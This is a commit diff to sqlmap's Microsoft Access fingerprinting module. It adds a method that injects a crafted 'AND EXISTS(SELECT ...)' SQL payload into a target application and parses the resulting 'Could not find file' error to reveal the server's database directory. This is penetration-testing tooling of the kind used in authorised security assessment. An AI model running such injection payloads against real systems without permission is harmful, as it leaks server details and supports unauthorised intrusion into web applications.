one more ms access update

This commit is contained in:
Miroslav Stampar 2010-11-02 10:50:57 +00:00
parent c98d8fed83
commit 6ad8bbfc8e

View File

@ -14,6 +14,8 @@ from lib.core.common import formatDBMSfp
from lib.core.common import formatFingerprint from lib.core.common import formatFingerprint
from lib.core.common import getHtmlErrorFp from lib.core.common import getHtmlErrorFp
from lib.core.common import randomInt from lib.core.common import randomInt
from lib.core.common import randomStr
from lib.core.common import wasLastRequestError
from lib.core.data import conf from lib.core.data import conf
from lib.core.data import kb from lib.core.data import kb
from lib.core.data import logger from lib.core.data import logger
@ -42,13 +44,13 @@ class Fingerprint(GenericFingerprint):
payload = agent.payload(newValue=query) payload = agent.payload(newValue=query)
result = Request.queryPage(payload) result = Request.queryPage(payload)
retVal = "not sandboxed" if result else "sandboxed" retVal = "not sandboxed" if result else "sandboxed"
return retVal return retVal
def __sysTablesCheck(self): def __sysTablesCheck(self):
infoMsg = "executing system table(s) existance fingerprint" infoMsg = "executing system table(s) existance fingerprint"
logger.info(infoMsg) logger.info(infoMsg)
# Microsoft Access table reference updated on 01/2010 # Microsoft Access table reference updated on 01/2010
sysTables = { sysTables = {
"97": ("MSysModules2", "MSysAccessObjects"), "97": ("MSysModules2", "MSysAccessObjects"),
@ -83,6 +85,30 @@ class Fingerprint(GenericFingerprint):
return None return None
def __getDatabaseDir(self):
retVal = None
infoMsg = "searching for database directory"
logger.info(infoMsg)
randInt = randomInt()
randStr = randomStr()
query = agent.prefixQuery("AND EXISTS(SELECT * FROM %s.%s WHERE %d=%d)" % (randStr, randStr, randInt, randInt))
query = agent.postfixQuery(query)
payload = agent.payload(newValue=query)
page = Request.queryPage(payload, content=True)
if wasLastRequestError():
match = re.search("Could not find file\s+'([^']+?)'", page[0])
if match:
retVal = match.group(1).rstrip("%s.mdb" % randStr)
if retVal.endswith('\\'):
retVal = retVal[:-1]
return retVal
def getFingerprint(self): def getFingerprint(self):
value = "" value = ""
wsOsFp = formatFingerprint("web server", kb.headersFp) wsOsFp = formatFingerprint("web server", kb.headersFp)
@ -120,6 +146,8 @@ class Fingerprint(GenericFingerprint):
if htmlErrorFp: if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
value += "\ndatabase directory: '%s'" % self.__getDatabaseDir()
return value return value
def checkDbms(self): def checkDbms(self):